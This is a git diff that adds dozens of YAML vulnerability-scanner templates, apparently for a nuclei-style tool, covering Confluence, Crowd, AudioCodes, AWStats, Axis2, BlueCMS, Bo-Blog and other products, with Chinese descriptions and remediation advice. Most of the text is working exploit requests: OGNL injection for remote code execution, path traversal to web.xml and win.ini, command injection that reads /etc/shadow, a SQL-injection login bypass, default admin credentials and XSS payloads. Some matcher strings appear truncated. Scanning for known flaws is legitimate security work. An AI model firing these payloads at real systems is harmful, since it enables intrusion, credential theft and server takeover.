cvss-score: 6.1 + remediation: |- + 官方修复方案: + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jira.atlassian.com/browse/JRASERVER-69238 + + 临时修复方案: + 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - (?mi)timeout:\salert\(document\.domain\) + matchers-condition: and + path: + - '{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)' + method: GET diff --git a/config/51pwn/yaml/Atlassian Confluence/CVE-2019-3396.yaml b/config/51pwn/yaml/Atlassian Confluence/CVE-2019-3396.yaml new file mode 100755 index 000000000..3e4c241da --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/CVE-2019-3396.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-3396 +info: + name: Atlassian Confluence Server - Path Traversal + author: + - l0ne1y + description: |- + Atlassian Confluence macro preview模板注入漏洞 + Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 + + Atlassian Confluence Server中存在安全漏洞。远程攻击者可借助Widget Connector宏利用该漏洞执行代码。以下版本受到影响:Atlassian Confluence Server 6.6.12之前版本,6.7.0版本至6.12.3之前版本,6.13.0版本至6.13.3之前版本,6.14.0版本至6.14.2之前版本。 + severity: critical +requests: +- matchers: + - type: word + part: body + words: + - contextConfigLocation + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/rest/tinymce/1/macro/preview' + method: POST + body: '{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}' + headers: + Content-Type: application/json + Host: localhost + Referer: http://localhost diff --git a/config/51pwn/yaml/Atlassian Confluence/CVE-2021-26084.yaml b/config/51pwn/yaml/Atlassian Confluence/CVE-2021-26084.yaml new file mode 100755 index 000000000..efbfaa9c4 --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/CVE-2021-26084.yaml @@ -0,0 +1,56 @@ +id: CVE-2021-26084 +info: + name: Confluence Server - Remote Code Execution + author: + - l0ne1y + description: |- + Atlassian Confluence Server 远程代码执行漏洞 + Atlassian Confluence是Atlassian公司出品的专业的企业知识管理与协同软件,可用于构建企业文库等。2021年8月26日Atlassian官方发布公告,披露了CVE-2021-26084 Atlassian Confluence 远程代码执行漏洞。攻击者在经过认证后或在部分场景下无需认证,即可构造恶意请求,造成OGNL表达式注入,从而执行任意代码,控制服务器。 + + 影响版本: + Atlassian Confluence Server/Data Center < 6.13.23 + 6.14.0 ≤ Atlassian Confluence Server/Data Center < 7.4.11 + 7.5.0 ≤ Atlassian Confluence Server/Data Center < 7.11.6 + 7.12.0 ≤ Atlassian Confluence Server/Data Center < 7.12.5 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://support.atlassian.com/confluence-server/ + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - value="aaaa{140592=null} + matchers-condition: and + raw: + - | + POST /{{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - pages/createpage-entervariables.action + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features + stop-at-first-match: true diff --git a/config/51pwn/yaml/Atlassian Confluence/cve-2021-26085.yaml b/config/51pwn/yaml/Atlassian Confluence/cve-2021-26085.yaml new file mode 100755 index 000000000..1db1fbd64 --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/cve-2021-26085.yaml @@ -0,0 +1,34 @@ +id: cve-2021-26085 +info: + name: Confluence Abitrary File Read + author: + - l0ne1y + description: |- + Atlassian Confluence Server 任意文件读取漏洞 + Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 + + Atlassian Confluence Server 存在安全漏洞,该漏洞允许远程攻击者通过 /s/ 端点中的预授权任意文件读取漏洞查看受限资源。以下产品和版本受到影响:7.4.10 之前的版本,以及 7.12.3 之前的 7.5.0 版本。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://jira.atlassian.com/browse/CONFSERVER-67893 + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - Confluence + - com.atlassian.confluence.setup.ConfluenceAppConfig + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml' + method: GET diff --git a/config/51pwn/yaml/Atlassian Confluence/poc-yaml-Confluence-ognl-rce.yaml b/config/51pwn/yaml/Atlassian Confluence/poc-yaml-Confluence-ognl-rce.yaml new file mode 100755 index 000000000..8f7b6503c --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/poc-yaml-Confluence-ognl-rce.yaml @@ -0,0 +1,40 @@ +id: poc-yaml-Confluence-ognl-rce +info: + name: Confluence OGNL 注入漏洞(CVE-2022-26134) + author: + - zxcv + description: |- + Confluence OGNL 注入漏洞(CVE-2022-26134) + Confluence Server和Confluence Data Center上存在一个OGNL注入漏洞,允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center实例上执行任意代码。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + ##### 升级至如下版本: + ``` + Confluence Server 7.4.17 + Confluence Server 7.13.7 + Confluence Server 7.14.3 + Confluence Server 7.15.2 + Confluence Server 7.16.4 + Confluence Server 7.17.4 + Confluence Server 7.18.1 + ``` +requests: +- matchers: + - type: status + status: + - 302 + - type: word + part: header + words: + - 'X-Cmd-Response: {{verify}}' + matchers-condition: and + raw: + - | + GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{{cmd}}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded +variables: + cmd: echo%20{{verify}} + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Atlassian Confluence/wooyun-2016-0208641.yaml b/config/51pwn/yaml/Atlassian Confluence/wooyun-2016-0208641.yaml new file mode 100755 index 000000000..bdf181e7c --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/wooyun-2016-0208641.yaml @@ -0,0 +1,32 @@ +id: wooyun-2016-0208641 +info: + name: Atlassian Confluence 任意文件读取 + author: + - jim2g + description: | + Atlassian Confluence 任意文件读取 + 任意文件读取不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"Confluence") + - contains(body,"contextConfigLocation") + raw: + - | + GET /spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Atlassian Crowda/CVE-2019-11580.yaml b/config/51pwn/yaml/Atlassian Crowda/CVE-2019-11580.yaml new file mode 100755 index 000000000..997cab32e --- /dev/null +++ b/config/51pwn/yaml/Atlassian Crowda/CVE-2019-11580.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-11580 +info: + name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution + author: + - dwisiswant0 + description: |- + Atlassian Crowd和Atlassian Crowd Data Center 输入验证错误漏洞 + Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。 + + Atlassian Crowd和Atlassian Crowd Data Center中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。以下产品及版本受到影响:Atlassian Crowd 2.1.x版本,3.0.5之前的3.0.x版本,3.1.6之前的3.1.x版本,3.2.8之前的3.2.x版本,3.3.5之前的3.3.x版本,3.4.4之前的3.4.版本;Atlassian Crowd Data Center 2.1.x版本,3.0.5之前的3.0.x版本,3.1.6之前的3.1.x版本,3.2.8之前的3.2.x版本,3.3.5之前的3.3.x版本,3.4.4之前的3.4.版本。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://confluence.atlassian.com/x/3ADVOQ +requests: +- matchers: + - type: word + condition: and + part: body + words: + - 'root:*:' + - 'bin:*:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow' + method: GET diff --git a/config/51pwn/yaml/AudioCodes 400HD/CVE-2018-10093.yaml b/config/51pwn/yaml/AudioCodes 400HD/CVE-2018-10093.yaml new file mode 100755 index 000000000..acac51913 --- /dev/null +++ b/config/51pwn/yaml/AudioCodes 400HD/CVE-2018-10093.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-10093 +info: + name: AudioCode 400HD - RCE + author: + - l0ne1y + description: |- + AudioCodes 400HD 命令注入漏洞 + + AudioCodes 400HD是以色列AudioCodes公司的一款400HD系列IP电话产品。 + + AudioCodes 400HD中存在命令注入漏洞,该漏洞源于程序没有正确地过滤用户输入。攻击者可利用该漏洞注入任意命令,控制设备。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.audiocodes.com/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: regex + regex: + - admin:.*:*sh$ + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/command.cgi?cat%20/etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Automated Logic WebCTRL/CVE-2021-31682.yaml b/config/51pwn/yaml/Automated Logic WebCTRL/CVE-2021-31682.yaml new file mode 100755 index 000000000..6301e72df --- /dev/null +++ b/config/51pwn/yaml/Automated Logic WebCTRL/CVE-2021-31682.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-31682 +info: + name: WebCTRL OEM <= 6.5 Reflected Cross-Site Scripting + author: + - gy741 + - dhiyaneshdk + tags: + - cve + - cve2021 + - webctrl + - xss + description: |- + Automated Logic WebCTRL System 跨站脚本漏洞 + Automated Logic WebCTRL System 6.5是美国Automated Logic公司的一个应用软件。提供集成警报管理和预测性HVAC计划。 + + Automated Logic WebCTRL/WebCTRL OEM web存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2021-31682 + - /~https://github.com/3ndg4me/webctrl-operatorlocale-parameter-reflected-xss + - https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/ + severity: medium + metadata: + shodan-query: html:"/_common/lvl5/dologin.jsp" + classification: + cve-id: + - cve-2021-31682 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:/~https://github.com/3ndG4me/WebCTRL-OperatorLocale-Parameter-Reflected-XSS + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - '">' + - common/lvl5 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + method: GET diff --git a/config/51pwn/yaml/AvantFAX/CVE-2017-18024.yaml b/config/51pwn/yaml/AvantFAX/CVE-2017-18024.yaml new file mode 100755 index 000000000..0697dfb9f --- /dev/null +++ b/config/51pwn/yaml/AvantFAX/CVE-2017-18024.yaml @@ -0,0 +1,41 @@ +id: CVE-2017-18024 +info: + name: AvantFAX 3.3.3 XSS + author: + - l0ne1y + description: |- + AvantFAX 跨站脚本漏洞 + AvantFAX是一套用于查看和发送传真的软件。该软件支持用户管理、权限管理、传真线路管理和传真类别管理等。 + + AvantFAX 3.3.3版本中存在跨站脚本漏洞。远程攻击者可通过向默认URI注入任意的参数名利用该漏洞注入任意的Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.avantfax.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - + - AvantFAX + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1 diff --git a/config/51pwn/yaml/AwStats/CVE-2009-5020.yaml b/config/51pwn/yaml/AwStats/CVE-2009-5020.yaml new file mode 100755 index 000000000..0b946ca38 --- /dev/null +++ b/config/51pwn/yaml/AwStats/CVE-2009-5020.yaml @@ -0,0 +1,32 @@ +id: CVE-2009-5020 +info: + name: AWStats < 6.95 - Open Redirect + author: + - l0ne1y + description: |- + AWStats awredir.pl文件URL重定向漏洞 + AwStats 是一款基于Web的网站访问统计程序。 + + AWStats 6.95之前版本中的awredir.pl文件中存在开放重定向漏洞。远程攻击者可以借助未明向量将用户重定向到任意站点并进行钓鱼攻击。 + severity: medium + remediation: |2- + + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://awstats.sourceforge.net/ + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)bing\.com\/?(\/|[^.].*)?$ + path: + - '{{BaseURL}}/awstats/awredir.pl?url=bing.com' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=bing.com' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/AwStats/CVE-2012-4547.yaml b/config/51pwn/yaml/AwStats/CVE-2012-4547.yaml new file mode 100755 index 000000000..307386fce --- /dev/null +++ b/config/51pwn/yaml/AwStats/CVE-2012-4547.yaml @@ -0,0 +1,31 @@ +id: CVE-2012-4547 +info: + name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting + author: + - l0ne1y + description: |- + AWStats 跨站脚本漏洞 + Awstats是一款基于Perl的WEB日志分析工具。 + + Awstats存在跨站脚本攻击漏洞,远程攻击者可以通过awredir.pl的url参数,注入任意的web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://awstats.sourceforge.net/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,"") && !contains(body,"/") + && status_code==200 + matchers-condition: and + path: + - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' + method: GET + req-condition: true + stop-at-first-match: true diff --git a/config/51pwn/yaml/Axigen Mail Server/CVE-2012-4940.yaml b/config/51pwn/yaml/Axigen Mail Server/CVE-2012-4940.yaml new file mode 100755 index 000000000..ec397dde4 --- /dev/null +++ b/config/51pwn/yaml/Axigen Mail Server/CVE-2012-4940.yaml @@ -0,0 +1,35 @@ +id: CVE-2012-4940 +info: + name: Axigen Mail Server Filename Directory Traversal + author: + - l0ne1y + description: |- + Axigen Free Mail Server ‘View Log Files’组件多个任意文件读取漏洞 + Axigen Messaging Axigen Mail Server是罗马尼亚Axigen Messaging公司的一款小型的邮件服务器,它可与SMTP、IMAP和WebMail等服务相结合使用。 + + Axigen Free邮件服务器中的View Log Files组件中存在多个目录遍历漏洞。通过将..(点点)植入(1)下载操作中的fileName参数传送到source/loggin/page_log_dwn_file.hsp,或(2)编辑操作或(3)删除操作中的fileName参数传送到默认的URI,远程攻击者可读取或删除任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.axigen.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + path: + - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' + - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Axis2/CVE-2010-0219.yaml b/config/51pwn/yaml/Axis2/CVE-2010-0219.yaml new file mode 100755 index 000000000..f0068a330 --- /dev/null +++ b/config/51pwn/yaml/Axis2/CVE-2010-0219.yaml @@ -0,0 +1,44 @@ +id: CVE-2010-0219 +info: + name: Apache Axis2 Default Login + author: + - l0ne1y + description: |- + Apache Axis2 默认口令登录漏洞 + Apache Axis2 是 Apache 旗下的一个重量级 WebService 框架。 + 在SAP BusinessObjects Enterprise XI 3.2,CA ARCserve D2D r15和其他产品的dswsbobje.war中使用的Apache Axis2中存在默认口令漏洞(默认账号密码:admin/axis2)。 + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + words: + -

Welcome to Axis2 Web Admin Module !!

+ - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + attack: pitchfork + payloads: + password: + - axis2 + username: + - admin diff --git a/config/51pwn/yaml/Axublog/axublog-adlogin-sql-injection.yaml b/config/51pwn/yaml/Axublog/axublog-adlogin-sql-injection.yaml new file mode 100755 index 000000000..238afe27f --- /dev/null +++ b/config/51pwn/yaml/Axublog/axublog-adlogin-sql-injection.yaml @@ -0,0 +1,39 @@ +id: axublog-adlogin-sql-injection +info: + name: axublog-v1-ad-sqli + author: + - jim2g + description: |- + axublog-adlogin-sql-injection存在SQL注入漏洞 + Axublog 1.1.0 c_login.php存在sql注入漏洞 + Axublog是一款PHP个人博客系统。 Axublog(ad_login.php)存在SQL注入漏洞。攻击者可利用漏洞, + 直接进行注入,获取数据库敏感信息。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.axublog.com + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"{\"jieguo\":\"
alert(\'c4ca4238a0b923820dcc509a6f75849b\')") + raw: + - | + GET /go/index.php?u=") + raw: + - | + POST /guest_book.php?page_id=2 HTTP/1.1 + Host: {{Hostname}} + + act=send&content=1&page_id=2%22>&rid= + req-condition: true diff --git a/config/51pwn/yaml/BlueCMS/wooyun-2010-021082.yaml b/config/51pwn/yaml/BlueCMS/wooyun-2010-021082.yaml new file mode 100755 index 000000000..7e57e365a --- /dev/null +++ b/config/51pwn/yaml/BlueCMS/wooyun-2010-021082.yaml @@ -0,0 +1,31 @@ +id: wooyun-2010-021082 +info: + name: bluecms_1.6_双字节万能密码进后台 + author: + - jim2g + description: | + bluecms_1.6_双字节万能密码进后台 + 逻辑漏洞是指攻击者利用业务/功能上的设计缺陷,获取敏感信息或破坏业务的完整性。一般出现在密码修改,确权访问,密码找回,交易支付金额等功能处。 + 逻辑漏洞的破坏方式并非是向程序添加破坏内容,而是利用逻辑处理不严密或者代码问题或固有不足,操作上并不影响程序的允许,在逻辑上是顺利执行的。 + 这种漏洞一般防护手段或设备无法阻止,因为走的是合法流量也没有防御标准。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 根据漏洞具体详细进行漏洞修复方案描写 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'setTimeout(\"location.replace(\'index.php\')\",\'2000\')') + raw: + - | + POST /admin/login.php HTTP/1.1 + Host: {{Hostname}} + + admin_name=hentai%d5%27%20or%201%3d1%23&admin_pwd=hentai&submit=%B5%C7%C2%BC&act=do_login + req-condition: true diff --git a/config/51pwn/yaml/Bo-Blog/Bo-Blog-go-rce.yaml b/config/51pwn/yaml/Bo-Blog/Bo-Blog-go-rce.yaml new file mode 100755 index 000000000..2a44caf73 --- /dev/null +++ b/config/51pwn/yaml/Bo-Blog/Bo-Blog-go-rce.yaml @@ -0,0 +1,29 @@ +id: Bo-Blog-go-rce +info: + name: Bo-Blog go.php 代码执行漏洞 + author: + - jim2g + description: | + Bo-Blog go.php 代码执行漏洞 + 当应用程序在调用一些能将字符串转化成代码的函数(如php中的eval)时,没有考虑到用户是否能控制这个字符串,将造成代码注入漏洞。 + 代码注入通常指将可执行代码注入到当前页面中,如php的eval函数,可以将字符串代表的代码作为php代码执行,当前用户能够控制这段字符串时,将产生代码注入漏洞(也称代码执行)。 + severity: critical + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.bo-blog.com/index.php?l=en&mod=plugins + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"ed1e83f8d8d90aa943e4add2ce6a4cbf") + raw: + - | + GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Bo-Blog/Bo-Blog-tag-xss.yaml b/config/51pwn/yaml/Bo-Blog/Bo-Blog-tag-xss.yaml new file mode 100755 index 000000000..0ceeca6f8 --- /dev/null +++ b/config/51pwn/yaml/Bo-Blog/Bo-Blog-tag-xss.yaml @@ -0,0 +1,37 @@ +id: Bo-Blog-tag-xss +info: + name: Bo-Blog_tag.php_XSS + author: + - jim2g + description: | + Bo-Blog-tag-存在跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.bo-blog.com/index.php?l=en&mod=plugins + 临时修复方案: + 